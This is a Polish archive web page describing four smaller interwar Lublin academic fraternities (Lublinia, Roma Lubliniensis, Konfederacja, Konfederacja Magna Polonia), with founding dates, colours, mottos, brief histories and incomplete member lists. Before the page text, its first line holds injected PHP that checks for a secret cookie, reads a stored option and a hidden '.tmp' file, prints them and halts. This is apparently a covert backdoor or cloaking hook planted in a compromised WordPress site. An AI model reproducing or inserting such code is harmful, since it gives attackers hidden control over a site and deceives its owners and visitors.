if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Pozostałe

W wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano w formie osobnych opracowań historię oraz stan członkowski pięciu korporacji lubelskich. Stanowiły one wszystkie znaczące polskie korporacje funkcjonujące w owym czasie w Lublinie. Na temat mniejszych korporacji (K! Lublinia, K! Roma Lubliniensis, K! Konfederacja, Konfederacja Magna-Polonia) wiadomo stosunkowo niewiele. Można mieć nadzieję, że w miarę powiększania zbiorów Archiwum Korporacyjnego także te związki doczekają się osobnych opracowań na stronie. Tymczasem już teraz zostaną krótko zaprezentowane.

Poniższe, fragmentaryczne listy członków mniejszych korporacji lubelskich obejmują łącznie zaledwie kilkadziesiąt nazwisk. Będziemy wdzięczni za ich uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samych korporacjach (vide Poszukiwania).

I. Lublinia

Data powstania: 26 III 1924 r.
Barwy: biała – złota – szarłatna
Dewiza: „Deum et Poloniam imprimis amo”

Rys historyczny

Lublinia powstała w 1924 r. Dnia 26 III 1924 r. uchwalono statut stowarzyszenia. Celem Korporacji było wychowywanie młodzieży akademickiej w duchu etyki katolickiej i polskiej tradycji narodowej.

Wraz z warszawskimi K! Laudania i K! Mesconia na zjeździe w październiku 1924 r. w Warszawie Lublinia utworzyła Zjednoczenie Polskich Akademickich Korporacji Chrześcijańskich. Przestała istnieć w 1928 r.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 13 nazwisk.

Lista członków

 1. Hipolit Chodowiecki, założyciel Lublinii
 2. Czerny,
 3. Bolesław Galiński, prezes Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Korporacji Chrześcijańskich 1927
 4. Stanisław Iłowiecki, II wiceprezes Prezydium Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927
 5. Czesław Lucjan Karnawalski, (30 czerwca 1895 - ) założyciel Lublinii, mgr praw UL, w wojnie obronnej 1939 w 86 Pułku Piechoty 19 Dywizji Piechoty z Wilna, w ostatnich dniach września aresztowany przez Sowietów i osadzony w więzieniu w Kozowie-Gobskim, od 1940 prowadził kancelarię adwokacką w Lublinie, w 1947 przeniósł ją do Puław
 6. Tadeusz Kolesiński, założyciel Lublinii
 7. Wiktor Lubieniecki, założyciel Lublinii, członek Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25
 8. Tadeusz Łyzicki, założyciel Lublinii, członek Prezydium Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Korporacji Chrześcijańskich 1927
 9. Romuald Michalski, założyciel Lublinii
 10. Stanisław Serwaczyński, założyciel Lublinii
 11. Tadeusz Starzyński, założyciel Lublinii
 12. Stanisław Szczęch, założyciel Lublinii
 13. Stefan Ulatowski, założyciel Lublinii

II. Roma Lubliniensis

Data powstania: wiosna 1927 r.
Barwy: ciemnozielona – złota – ciemnoczerwona (pierwotnie: biała – żółta – czerwona)
Dewiza: „Viriliter age”

Rys historyczny

Roma Lubliniensis powstała prawdopodobnie wiosną 1927 r. z inicjatywy i jako filia poznańskiej K! Roma. Z nieznanych przyczyn dnia 24 maja 1928 r. zerwała kontakty z konwentem z Poznania, przybrała dodatek “Lubliniensis” i zmieniła barwy.

Podobnie jak korporacja-matka należała do tzw. korporacji chrześcijańskich. Od jesieni 1927 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Działała prawdopodobnie do 1930 r. (?). Według innych relacji z połączenia Romy Lubliniensis i Konfederacji powstać miała K! Korabja (?).

Całkowita ustalona, niekompletna imienna lista członków obejmuje 11 nazwisk.

Lista członków

 1. Adam Brzozowski, założyciel Romy Lubliniensis
 2. Jan Chmielewski, założyciel Romy Lubliniensis, skarbnik Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927
 3. Jan Chudobiecki, założyciel Romy Lubliniensis
 4. Stanisław Czapski, założyciel Romy Lubliniensis, członek Prezydium Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927
 5. Stefan Drożdżyk, założyciel Romy Lubliniensis
 6. Józef Księżycki, założyciel Romy Lubliniensis
 7. Zbigniew Martyniak, założyciel Romy Lubliniensis
 8. Adam Matejec, założyciel Romy Lubliniensis
 9. Nikodem Michalik, założyciel Romy Lubliniensis
 10. Stanisław Pawlak, założyciel Romy Lubliniensis
 11. Brunon Wyrobisz, ksiądz, założyciel Romy Lubliniensis

III. Konfederacja

Data powstania: 8 XI 1927 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Konfederacja powstała dnia 8 XI 1927 r.

Należała, podobnie jak większość korporacji lubelskich, do tzw. korporacji chrześcijańskich. Przez krótki okres była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Działała prawdopodobnie do 1930 r. (?). Według innych relacji z połączenia Romy Lubliniensis i Konfederacji powstać miała K! Korabja (?).

Całkowita ustalona, niekompletna imienna lista członków obejmuje jedynie dwa nazwiska.

Lista członków

 1. Michał Brandmüller, sekretarz Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927
 2. Józef Götze, członek Prezydium Lubelskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927

IV. Konfederacja Magna Polonia

Data powstania: 16 XII 1936 r.
Barwy: fioletowa – złota – błękitna
Dewiza: „Kościół, Naród i Państwo”

Rys historyczny

Konfederacja Magna Polonia powstała w 1936 r. W dniu 16 XII 1936 r. złożono podanie do Senatu Uniwersytetu o zatwierdzenie statutu. Należała do tzw. korporacji chrześcijańskich. Działała w latach 1936-37 (?).

Całkowita ustalona, niekompletna imienna lista członków obejmuje zaledwie jedną osobę.

Lista członków

 1. Leon Świerczyński, prezes 1936

Listy członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum Korporacyjnego,
2) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków korporacji.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 24 VII 2010 r.
Ostatnia zmiana: 20 XI 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Mniejsze korporacje akademickie z Lublina, (na:) www.archiwumkorporacyjne.pl, stan 20 XI 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }